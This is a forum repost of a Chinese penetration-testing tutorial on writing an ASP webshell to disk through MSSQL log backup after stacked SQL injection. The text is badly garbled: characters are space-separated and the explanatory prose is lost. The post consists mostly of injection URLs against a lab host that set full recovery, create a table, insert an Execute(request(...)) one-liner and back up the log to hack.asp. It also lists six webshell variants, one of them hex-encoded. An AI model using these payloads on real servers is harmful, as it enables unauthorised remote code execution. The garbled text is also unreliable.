搜索

[21148] 2020-07-19_Web渗透之mssqlLOG备份getshell

文档创建者:s7ckTeam
浏览次数:47
最后更新:2025-01-18
2020-07-19_Web渗透之mssqlLOG备份getshell W e b m s s q l   L O G g e t s h e l l L e m o n S e c   2 0 2 0 - 0 7 - 1 9 l o g S Q L D B W E B S H E L L , l o g , L O G , D B .   L O G , , L O G l o g L O G a l t e r   d a t a b a s e   X X X   s e t   R E C O V E R Y   F U L L O G : : a s p _ t e s t , " E : w w w r o o t a s p _ s q l i " ; a l t e r   d a t a b a s e     s e t   R E C O V E R Y   F U L L   - - ; c r e a t e   t a b l e   c m d   ( a   i m a g e )   - - ; b a c k u p   l o g     t o   d i s k   =   ' E : w w w r o o t a s p _ s q l i h a c k . a s p '   w i t h   i n i t   - - ; i n s e r t   i n t o   c m d   ( a )   v a l u e s   ( ' < % % 2 5 E x e c u t e ( r e q u e s t ( " g o " ) ) % % 2 5 > ' ) - -   ; b a c k u p   l o g     t o   d i s k   =   ' E : w w w r o o t a s p _ s q l i h a c k 2 . a s p '   - - h t t p : / / 1 9 2 . 1 6 8 . 5 . 2 1 : 8 1 / i n d e x . a s p ? i d = 1 ; a l t e r % 2 0 d a t a b a s e % 2 0 a s p _ t e s t % 2 0 s e t % 2 0 R E C O V E R Y % 2 0 F U L L % 2 0 - - h t t p : / / 1 9 2 . 1 6 8 . 5 . 2 1 : 8 1 / i n d e x . a s p ? i d = 1 ; c r e a t e % 2 0 t a b l e % 2 0 c m d % 2 0 ( a % 2 0 i m a g e ) % 2 0 - - h t t p : / / 1 9 2 . 1 6 8 . 5 . 2 1 : 8 1 / i n d e x . a s p ? i d = 1 ; b a c k u p % 2 0 l o g % 2 0 a s p _ t e s t % 2 0 t o % 2 0 d i s k % 2 0 = % 2 0 % 2 7 E : w w w r o o t a s p _ s q l i h a c k . a s p % 2 7 % 2 0 w i t h % 2 0 i n i t % 2 0 - -
w e b s h e l l 8 3 k b   h t t p : / / 1 9 2 . 1 6 8 . 5 . 2 1 : 8 1 / i n d e x . a s p ? i d = 1 ; b a c k u p % 2 0 l o g % 2 0 a s p _ t e s t % 2 0 t o % 2 0 d i s k % 2 0 = % 2 0 % 2 7 E : w w w r o o t a s p _ s q l i h a c k . a s p % 2 7 % 2 0 w i t h % 2 0 i n i t % 2 0 - - h t t p : / / 1 9 2 . 1 6 8 . 5 . 2 1 : 8 1 / i n d e x . a s p ? i d = 1 ; i n s e r t % 2 0 i n t o % 2 0 c m d % 2 0 ( a ) % 2 0 v a l u e s % 2 0 ( % 2 7 % 3 C % % 2 5 E x e c u t e ( r e q u e s t ( % 2 2 g o % 2 2 ) ) % % 2 5 % 3 E % 2 7 ) % 2 0 - - h t t p : / / 1 9 2 . 1 6 8 . 5 . 2 1 : 8 1 / i n d e x . a s p ? i d = 1 ; b a c k u p % 2 0 l o g % 2 0 a s p _ t e s t % 2 0 t o % 2 0 d i s k % 2 0 = % 2 0 % 2 7 E : w w w r o o t a s p _ s q l i h a c k 2 . a s p % 2 7 % 2 0 - - h a c k . a s p h a c k 2 . a s p
6 , 4   v a l u e s ,   .   :     a ) . < % % 2 5 E x e c u t e ( r e q u e s t ( " g o " ) ) % % 2 5 >   b ) . < % E x e c u t e ( r e q u e s t ( " g o " ) ) % >   c ) . % > < % e x e c u t e   r e q u e s t ( " g o " ) % > < %   d ) . < s c r i p t   l a n g u a g e = V B S c r i p t   r u n a t = s e r v e r > e x e c u t e   r e q u e s t ( " s b " ) < / S c r i p t >   e ) . < % 2 5 E x e c u t e ( r e q u e s t ( " l " ) ) % 2 5 >   f ) . 0 x 3 C 2 5 6 5 7 8 6 5 6 3 7 5 7 4 6 5 2 8 7 2 6 5 7 1 7 5 6 5 7 3 7 4 2 8 2 2 6 1 2 2 2 9 2 9 2 5 3 E h t t p s : / / w w w . c n b l o g s . c o m / - q i n g - / p / 1 0 6 9 2 8 2 4 . h t m l
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理